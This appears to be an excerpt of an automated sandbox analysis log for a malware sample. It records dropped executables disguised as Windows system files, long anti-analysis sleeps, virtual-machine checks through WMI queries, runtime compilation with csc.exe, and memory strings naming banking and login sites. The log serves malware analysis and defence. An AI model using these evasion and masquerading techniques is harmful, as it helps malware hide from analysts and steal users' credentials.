Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 300000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597916
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597797
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597686
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597575
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597317
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597188
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597078
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596969
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596859
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596750
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596641
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596531
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596422
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596313
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596199
Source: C:\Users\Default\SystemSettings.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Window / User API: threadDelayed 4180
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Window / User API: threadDelayed 5474
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oTYKBhgS.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gBplMliu.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ExWQYAoA.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zpwiWXhy.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DBipIDSx.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QaswzdXY.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XuBMTZHB.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UQjmGZYR.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ekFuRFbl.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HkLqVmri.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ysVaBXSD.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yHDAltbA.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xIFQfYNI.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SzzvMtRI.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sVoRDbyU.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MnaxWgIk.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\Gnkizmcn.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BQDZBqHE.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LRfgsxYe.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KzWplSMm.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OpNfsPNf.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\Babyelsr.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KdaYGjcg.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\blrDaWHv.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CEHhnDDC.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ksfcTiin.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kjvJoyHh.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aJMMjFdF.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jFctadEf.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HrZgPASq.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kTLTKyNc.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\erTkMTCt.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rJPAIehM.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yGhYBYcD.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pHdSnvcQ.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ciTLwWWp.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vzGrPbhF.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aBctEWCA.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 3480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe TID: 3840 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe TID: 7148 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 6128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 7056 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 3292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\SystemSettings.exe TID: 7172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\SystemSettings.exe TID: 7196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 7288 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7728 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -599844s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -599641s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -599344s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7960 Thread sleep time: -14400000s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -599156s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -599016s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598891s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598778s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598633s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598516s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598406s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598297s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598188s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -598053s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7960 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597916s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597797s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597686s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597575s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597317s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7968 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597188s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -597078s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596969s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596859s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596750s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596641s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596531s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596422s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596313s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976 Thread sleep time: -596199s >= -30000s
Source: C:\Users\Default\SystemSettings.exe TID: 8136 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\lv961v43L3.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\lv961v43L3.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\SystemSettings.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\SystemSettings.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\lv961v43L3.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\SystemSettings.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F595A3 GetSystemInfo, 41_2_00007FF848F595A3
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\SystemSettings.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\SystemSettings.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 30000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 600000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599844
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599641
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599344
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 3600000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599156
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599016
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598891
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598778
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598633
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598516
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598406
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598297
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598188
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598053
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 300000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597916
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597797
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597686
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597575
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597317
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 60000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597188
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 597078
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596969
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596859
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596750
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596641
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596531
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596422
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596313
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 596199
Source: C:\Users\Default\SystemSettings.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: lWstwPVe1A.41.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: lv961v43L3.exe, 00000000.00000002.2079333667.00000000007A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lv961v43L3.exe, 00000000.00000002.2106767459.000000001B87B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}e2
Source: lWstwPVe1A.41.dr Binary or memory string: discord.comVMware20,11696428655f
Source: lWstwPVe1A.41.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: global block list test formVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: lWstwPVe1A.41.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: lWstwPVe1A.41.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: lWstwPVe1A.41.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: lWstwPVe1A.41.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: lWstwPVe1A.41.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: w32tm.exe, 0000001F.00000002.2131513567.0000018703389000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3267725444.0000000001755000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lWstwPVe1A.41.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: lWstwPVe1A.41.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: lWstwPVe1A.41.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: lWstwPVe1A.41.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: lWstwPVe1A.41.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: lWstwPVe1A.41.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: lWstwPVe1A.41.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: lWstwPVe1A.41.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: lWstwPVe1A.41.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: lWstwPVe1A.41.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\lv961v43L3.exe Process token adjusted: Debug
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Users\Default\SystemSettings.exe Process token adjusted: Debug
Source: C:\Users\Default\SystemSettings.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\lv961v43L3.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
